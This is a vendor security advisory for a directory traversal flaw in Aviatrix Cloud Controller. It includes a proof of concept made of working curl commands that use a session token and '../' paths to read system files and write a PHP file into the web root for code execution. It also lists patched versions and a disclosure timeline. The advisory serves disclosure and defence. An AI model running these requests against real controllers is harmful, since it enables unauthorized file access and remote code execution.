Directory traversal in Aviatrix allows an authenticated user to read and write to any file


Aviatrix Cloud Controller includes multiple APIs that by design upload files from authenticated users. Some of these APIs do not adequately sanitise their input, allowing an attacker to construct a pathname that is outside the intended upload directory. The directories that can be written to include those under the web root, which allows an attacker to upload and then run code of their choosing.

Proof of concept

  1. Log into Aviatrix to obtain a CID token. This is sent in the response to the login_proc action, and used in most API calls.
$ curl -k https://aviatrix/v1/backend1 -d action=login_proc -d "username=Test User" -d "password=Password"
  1. Using the CID, make the following request, which will read a file from /tmp. On recent versions (after January 2021), replace the path with /../../../var/www/build_info:
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=get_metric_gw_selections -d account_name=/../../../../../tmp/build_info
  1. Make the following request, which will create a file in /var/www/php/downloads. This directory is not protected by a .htaccess file.
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=set_metric_gw_selections -d account_name=/../../downloads/test.php -d data="hello<?php phpinfo()?>"
  1. Visit https://aviatrix/v1/downloads/test.php, which will show the PHP Version information.

Mitigation/further actions

Upgrade to one of the following versions:

  • UserConnect-6.2-1804.2043 or later
  • UserConnect-6.3-1804.2490 or later
  • UserConnect-6.4-1804.2838 or later
  • UserConnect-6.5-1804.1922 or later

Advisory timeline

  1. 2021-04-20: Discovered
  2. 2021-08-24: Reported to Aviatrix security team
  3. 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
  4. 2021-09-11: Fix released


Base score 6.8
Attack vector Network
Attack complexity Low
Privileges required High
User interaction None
Scope Changed
Confidentiality High
Integrity None
Availability None


  • Severity
    Medium (base score 6.8)
  • Discovered by
    Glyn Wintle
  • Severity
  • Advisory ID
  • CVE
    (CVE not assigned)
  • Component/package
    Cloud Controller
  • Version
    022021 (2021-05-10, R6.4.2499)
  • Published